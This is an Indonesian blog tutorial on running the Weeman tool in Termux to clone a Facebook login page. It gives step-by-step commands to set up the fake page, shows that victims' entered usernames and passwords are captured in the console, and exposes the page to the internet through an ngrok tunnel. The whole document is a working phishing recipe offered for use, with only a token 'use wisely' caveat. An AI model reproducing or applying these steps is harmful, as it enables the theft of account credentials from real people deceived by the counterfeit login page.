MASIGNCLEAN101

Cara Menggunakan Weeman

iklan banner

CARA MEMGGUNAKAN WEEMAN DI TERMUX

Pada tutorial termux sebelumnya kita sudah bahas tentang cara install weeman di termux, seperti yang telah di sampaikan sebelumnya bahwa tool weeman ini bisa membuat halaman login palsu suatu web, biasanya halan login fb atau gmail dan lain2. Jadi kita tinggal set saja halaman mau yang mau di buat. Bila sobat masih belum tau dan ingin menginstall nya silahkan baca di sini:  Cara install weeman


Dalam artikel ini kita lanjut share gimana cara menjalankan nya di termux, entah muda atau ribet mungkin tergantung cara sobat untuk memahami nya, gunakan hal ini dengan bijak sebagai pengetahuan yang mungkin akan berguna nanti.

Setelah sobat berhasil install tool weeman, Sekarang lanjut cara menggunakan nya. Sebagai contoh di sini saya contohkan membuat halaman login facebook, kenapa facebook,? Karna sosial media fb ini lebih sering di gunakan oleh pengguna internet.


CARA MENGGUNAKAN

Masuk Ke Folder Weeman
cd weeman

Jalankan
python2 weeman.py

Kita Set Url Facebook
set url http://facebook.com

Lalu Set Action nya
set action_url http://facebook.com

Dan Jalankan
run

Setelah Enter Seperti Gambar:



Setelah itu buka google ketik:
127.0.0.1:8080

Penampakan:


Kalau muncul halaman tidak error, berarti sobat sudah berhasil membuat tampilan login nya, kalau pengen mencoba login, silahkan sobat isi email sembarang dan pass terserah, lalu login dan cek termux. Biasanya akan muncul di termux user dan pass yang sobat masukkan tadi.

Dan bila sobat ingin mencoba beda jaringan, sobat harus punya forwarding dulu. Di sini saya contohkan forwarding menggunakan ngrok.

Note: sobat harus sudah menginstall ngrok dulu, untuk tutornya search di google


Seperti di atas setelah:
set action_url http://facebook.com
run

Lalu sobat buka sessions baru di termux, dan masuk folder ngrok lalu jalankan ngrok nya dengan ketik:
./ngrok http 8080

Nanti akan muncul tampilan seperti gambar di bawah, tunggu conection merah menjadi hijau:


Bila sudah hijau maka copy salah satu url yang saya lingkari di gambar bawah, pilih salah satu saja lalu pastekan di google

CONTOH
 http://blagcs675.ngrok.io

Penampakan gambar bila berhasil:


Halaman login nya bisa terus di akses selama sobat tidak set di termux masih sanby. Dan bila berhenti maka kita harus membuatnya dari awal lagi agar bisa di akses kembali.

Baca juga:  Membuat Tampilan Login Game Online Di Termux

Selamat mencoba, Terima kasih
Share This :